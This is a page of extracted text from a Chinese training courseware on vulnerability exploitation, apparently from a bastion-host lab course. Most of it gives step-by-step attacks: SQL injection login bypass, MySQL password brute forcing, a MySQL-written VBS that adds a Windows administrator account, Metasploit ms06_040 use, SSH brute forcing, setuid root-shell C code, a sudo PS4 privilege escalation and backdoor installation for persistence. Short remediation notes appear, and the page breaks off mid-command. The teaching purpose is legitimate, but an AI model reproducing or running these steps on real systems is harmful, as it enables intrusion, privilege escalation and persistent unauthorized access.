堡垒机实训指导(六)漏洞利用课件_第1页
堡垒机实训指导(六)漏洞利用课件_第2页
堡垒机实训指导(六)漏洞利用课件_第3页
堡垒机实训指导(六)漏洞利用课件_第4页
堡垒机实训指导(六)漏洞利用课件_第5页
已阅读5页,还剩50页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、实训一对MySQL数据库进行SQL注入攻击实训目的:SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,可能被入侵很长时间管理员都不会发觉。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些用户想得知的数据,这就是所谓的SQL Injection,即SQL注入。掌握SQL注入基本手段 了解WEB站点的脆弱性 修复存在SQL注入

2、可能的漏洞 漏洞利用实训步骤:通过分析存在SQL注入漏洞的PHP系统实例,掌握的常见SQL注入的基础知识正确错误假设我们知道该系统管理员用户名为admin,使用不同的帐户密码登录将会进入下图所示页面漏洞尝试在对一个网站进行安全检测的时候,检测者并不知道被检测的网站使用的是什么数据库及网页程序语言,需要对其进行一些手动探测。本实验中,在“用户”框输入一个单引号,密码留空,点击“登录”。结果分析:从返回信息Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/

3、login.php on line 12可以得知系统使用了PHP+MYSQL的架构,以及路径信息等。 而且很有可能存在含注入漏洞的SQL语句,如SELECT * FROM data WHERE name=。在上面的登陆界面中,选择IE浏览器的 查看 - 源文件,读取html源码 通过分析html源码,可以知道提交的username、password字段及post提交方式,及login.php的处理页面,后台的SQL语句确定是:SELECT * FROM TABLES WHERE username=$username 输入用户名为单引号,形成以下SQL语句:SELECT * FROM TABLE

4、S WHERE username=这样,最后的那个单引号就多余了,造成了语法错误。综上所述,我们现在可以确定注入成功的条件了,登陆时username输入框输入如下内容即可,甚至不需要输入密码:adminor1=1admin # 注: adminor1=1构建了SELECT * FROM user WHERE username=adminor 1=1 AND password=语句,直接通过1=1的恒等条件,让验证通过;而admin#构建了SELECT * FROM user WHERE username=admin # AND password=语句,用#形成对后半部分语句的注释,保证验证通过

5、。 实训二MySQL数据库漏洞利用实训目的:习使用口令暴力破解工具猜测Mysql帐户弱口令。 了解利用VBS脚本自动添加Mysql帐户信息。 学习常见的Mysql数据库安全加固方法。漏洞利用实训步骤:探测mysql对mysql服务器进行探测,telnet对方的3306端口。服务器返回成功登录的信息,这说明服务器正运行着mysql服务 安装MySQL客户端cd C:Program FilesMySQLMySQL 5.0bin 尝试登陆 尝试使用“root”帐号和空密码登录mysql服务器,在MySQL客户端bin目录下使用如下命令: 下载MySQL数据库客户端(mysql-5.0.22-win3

6、2.exe),并进行程序安装,在实验者PC上,打开CMD命令行窗口,在CMD命令窗口中,将当前路径切换到MySQL安装目录的“bin” ,使用如下命令:mysql -hxx.xx.xx.xx -uroot返回以下信息: ERROR 1045 (28000): Access denied for user rootxx.xx.xx.xx (using password: NO) 。D.口令破解 以上信息说明root帐号存在并且允许操作者通过任何主机登录,只不过因为密码错误而登录失败,即密码不为空。既然由于管理员的疏忽或贪图方便导致root帐号可以从任何一台主机上登录服务器,那我们可以通过远程破解

7、他的密码拿下mysql的权限,进而实施一系列的操作获得系统权限吗?答案是肯定的!下面我们今天要使用的工具“CrackU”隆重登场了。 E.CrackU的使用 该工具是一个基于命令行的口令破解工具,可破解mysql,telnet,SQL Server等口令。用法如下图(其中 “F: SandBoxtmpCrackU”为该工具所在的本地路径)。F.登陆服务器攻击者使用刚才获得的管理员帐号成功登录服务器 E.获取管理员权限在名为mysql的数据库建一个名为a,只有一列名为cmd的表。可使用以下的命令:use mysql;create table a (cmd text);向cmd表里插入四行数据in

8、sert into a set cmd=set wshshell=createobject (wscript.shell )r;insert into a set cmd=a=wshshell.run (cmd.exe /c net user 1 1 /add,0)r;insert into a set cmd=b=wshshell.run (cmd.exe /c net user 1 /active:yes,0)r;insert into a set cmd=c=wshshell.run (cmd.exe /c net localgroup Administrators 1 /add,0)r

9、; 插入数据部分完成,测试。把它导成一个可执行文件(.vbs)到系统的启动组里上图中标黄色的字体是我们要输入的命令行,标蓝色字体是系统返回的信息问题出现了,系统报错。因为系统默认安装时是不支持中文字符的,把参数character_set_client改成utf8,再把刚才的命令重新输入即可。生成的.vbs文件会在系统下次启动的时候起效,生成一个名为“1”,密码也为“1”的管理员帐号。成功登陆系统等对方系统起来后,我们就可以用“1”这个帐号通过远程桌面登录对方系统了。实训二 Windows系统缓冲区溢出漏洞利用实训目的:微软的Server 服务中存在一个远程执行代码漏洞,成功利用此漏洞的攻击者可

10、以完全控制受影响的系统。通过本实验可以了解Windows系统漏洞所能带来的危险,以及如何针对特定的Windows系统漏洞进行防御。漏洞利用实训步骤:GUI界面下使用Metasploit:从开始菜单里点击程序-Metasploit 3-Metasploit 3 GUI直接在搜索栏输入ms06_040,返回结果ms06_040_netapi双击返回结果ms06_040_netapi,弹出目标机操作系统选择对话框,请选择Automatic 点击前进,选择payload 参数windows/shell_bind_tcp后点击前进。在RHOST参数里填上目标机的IP地址,其它项按默认配置进行。检测各项设

11、置,在此步时可以选择保存现有的配置,以便下次使用。点击应用按钮,则可以开始对被攻击主机使用漏洞利用攻击,如果攻击成功,在metasploit界面的sessions栏中可以看到下图中高亮内容,双击后即可获得被攻击主机上的shell(DOS命令行)。进入C:Documents and SettingsAdministratorMy Documents目录,shell没有报错,已经取得系统权限。实训思考:临时解决方案:在防火墙处阻止TCP端口139和445。安装微软官方提供的安全补丁,该补丁可在以下路径获取: /download/f/2/f/f2f6f032-b0db-459d-9e89-fc021

12、8973e73/Windows2000-KB921883-x86-CHS.EXE (本案例中补丁文件为Windows2000-KB921883-x86-CHS.EXE,存放在目标操作系统的磁盘C根目录下)实训二 Linux漏洞利用实训目的: Linux 操作系统是一款开源的类UNIX操作系统,有多种发行版(Distributions),如 RedHat Linux、SUSE Linux、Debian Linux等等等等。这些发行版在系统安装、包管理、桌面应用等方面各有特色,但是其操作系统内核(Kernel)均来自于一个组织(),该组织负责Linux内核的更新、发布。在部分已发布的内核版本中,存

13、在一些严重影响操作系统安全的漏洞,Hacker 或 Cracker通过利用这些漏洞达到入侵并控制目标主机的目的,Cracker 甚至会通过这些漏洞入侵有问题的主机及该主机所在网络,以达到窃取保密信息、散播蠕虫木马、发起DDOS攻击等目的。通过2种不同漏洞的利用(内核调用漏洞及系统工具漏洞),对普通帐号进行本地提权,通过实际操作增加实验者对网络安全及主机操作系统安全的认识,对希望成为合格的 SA(System Administrator & Security Administrator)的实验者进行系统漏洞类的部分基础知识介绍。漏洞利用实训步骤:远程SSH服务口令暴力破解运行 xscan_gui

14、.exe 启动X-Scan程序。选择菜单 设置 - 扫描参数,弹出参数设置窗口,左侧选中检测范围选项,在右侧的“指定IP范围”下的文本框中输入目标主机IP地址 点开左侧的全局设置,进一步设置参数,选中左侧的“扫描模块”,在右侧仅选中 SSH弱口令为了加快扫描速度,适当增加扫描线程数,点击左侧的“并发扫描”,在右侧的ListBox中将ssh的扫描线程数修改为 30全局设置 点击左侧的“其他设置”,在右侧中仅选中“无条件扫描”点开左侧的插件设置,选中“端口相关设置”,在右侧的“待检测端口”下的文本框中输入SSH服务的默认端口号22 选中左侧的“字典文件设置”,双击右侧的“SSH密码字典”及“SSH

15、用户名字典”,分别设置为 ssh_pass.dic 及 ssh_user.dic,最后点击“确定”关闭参数设置窗口 点击绿色右三角图标开始扫描,扫描完成后扫描完成后会自动打开系统默认浏览器显示扫描结果,在 X-Scan 工具主窗口也可以看到相应结果, 在左侧窗口中 “/” 前面是用户名,后面是密码;在“安全漏洞及解决方案”列中,“/” 前面是用户名,后面是密码Linux本地提权1:利用内核调用漏洞(prctl()调用)用第一步获取的账户 tester(对此帐户进行提权) 登录远程主机 创建编写提权代码文件 命令格式: testerLT-courseware-0007$cat ex.c ex2.

16、c _EOF 代码内容如:#include int main (void) setuid(0);setgid(0); seteuid(0);setegid(0);system(“/bin/sh”);return(0); b). 编译提权文件ex2 命令格式: sh-3.00# gcc -o ex2 ex2.c staticc). 执行提权文件ex2 命令格式: sh-3.00# ./ex2d). 查看当前用户状态,可以看到当前的 uid 已经是 0 了,即获得了 root shell 命令格式:sh-3.00# id 【说明】至此,利用内核调用漏洞进行Linux本地用户提权成功,已经在test

17、er帐户环境下获取了root shell(即获得了拥有root权限的shell)。 LINUX本地提权2:利用系统工具漏洞(SUDO)用第一步获取的账户 test(对此帐户进行提权)登录远程主机切换到c shell命令格式:testLT-courseware-0007$csh 创建辅助脚本及提权源代码 命令格式:testLT-courseware-0007$cat ex.sh ex.c _EOF 帐户提权代码内容如下:#include int main (void) setuid(0);system(“/bin/sh”);return(0); 准备辅助脚本,编译提权代码a).为辅助脚本ex.s

18、h文件添加执行权限 命令格式: testLT-courseware-0007$chmod u+x ex.sh b). 编译提权源代码文件 命令格式: testLT-courseware-0007$gcc -o ex ex.c c). 查看文件属性,ex.sh 脚本具有了执行权限,ex 可执行程序的属主为 test, 组也为test 命令格式:testLT-courseware-0007$ls -al ex.shtestLT-courseware-0007$ls -al ex 设置环境变量,利用sudo 的漏洞改变 ex 可执行程序的属主和组,同时为其设置suid,我们可以看到, ex 可执行程

19、序的属主改变为 root,组也改变为root,同时设置了s位 命令格式: testLT-courseware-0007$setenv SHELLOPTS xtracetestLT-courseware-0007$setenv PS4 $(chown root:root ex;chmod u+s ex)testLT-courseware-0007$sudo ./ex.sh 查看提权文件ex的文件属性,ex 可执行程序的属主改变为 root,组也改变为root,同时设置了s位命令格式: testLT-courseware-0007$ls -al ex 注: 若执行 “sudo ./ex.sh” 后

20、提示输入密码,则输入 test 账户的密码。执行 ./ex 进行提权,我们可以看到,当前的 uid 已经是 0 了,即获得了 root shell 命令格式:testLT-courseware-0007$./ex 简易后门制作1: 添加/修改帐户,将后门程序作为默认shell在刚才获取的 root shell 权限的帐户test中,切换当前目录为/bin命令格式:sh-3.00# cd /bin 创建后门程序 命令格式:sh-3.00# cat bd.c _EOF 后门程序代码如:#include int main (void) setuid(0);setgid(0);seteuid(0);s

21、etegid(0);system(“/bin/sh”);return(0); 编译后门程序bd.c文件,并将原bd.c文件删除 命令格式: sh-3.00# gcc -o bd bd.c -staticsh-3.00# rm -f bd.c 添加账户或修改当前账户,并将该账户的 shell 设置为后门程序以直接获取 root shell 命令格式: sh-3.00# /usr/sbin/useradd -d /tmp -s /bin/bd testbdsh-3.00# psaaword testbd 图中红色框内的内容为创建后门程序,黄色框内的内容为添加一个账户,并设置该账户的home目录为/

22、tmp,登录shell为刚才创建的后门程序,帐户添加成功后用 passwd 命令设置为其密码。使用新创建的帐户testbd进行登录测试,启动一个新的 Putty 窗口, 输入添加帐户testbd时设置的密码, 登录后输入 id 查看用户权限:root shell 至此,已经完成帐户添加/修改简易后门程序制作,使得新添加,修改的帐户直接拥有默认的root shell权限。不需要再通过本地提权方式进行提权后在获得root shell 权限。简易后门制作2:将后门程序设置为自启动,通过网络登录保持刚才获取的 root shell 窗口打开;后面需要使用此窗口。在本机启动putty sftp 服务器端

23、软件工具,上传后门文件(ndoor.bz2) 命令格式:psftp open 目标主机 IP【需要输入用户名以及密码】psftp lcd 切换本地目录到 ndoor.bz2 文件所在路径psftp put ndoor.bz2查看上传ndoor.bz2文件是否已经存在,并退出psftp 命令格式:psftp ls *.bz2psftp exit 另起一个 Putty 程序,用普通帐户test登录。在test用户目录中查看ndoor.bz2文件,并解压缩刚才上传的后门程序 命令格式: testLT-courseware-0007 -$ls -al ndoor.bz2testLT-coursewar

24、e-0007 -$bunzip2 ndoor.bz2 切换到 root shell,【使用test帐户登录提权后的putty窗口】修改后门程序的属主、组及权限, 并将其移动到系统目录中,切换到ndoor文件的解压目录 命令格式:sh-3.00# cd /home/testsh-3.00# ls -al ndoor (修改程序属性并查看修改结果)ssh-3.00# chown root:root ndoorsh-3.00# chmod 755 ndoorsh-3.00# ls -al ndoor (移动ndoor文件到/bin目录下)sh-3.00# mv ndoor /bin 创建启动脚本,并在 run level 3 及 run level 5 中添加自启动 命令格式:sh-3.00# cat /etc

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论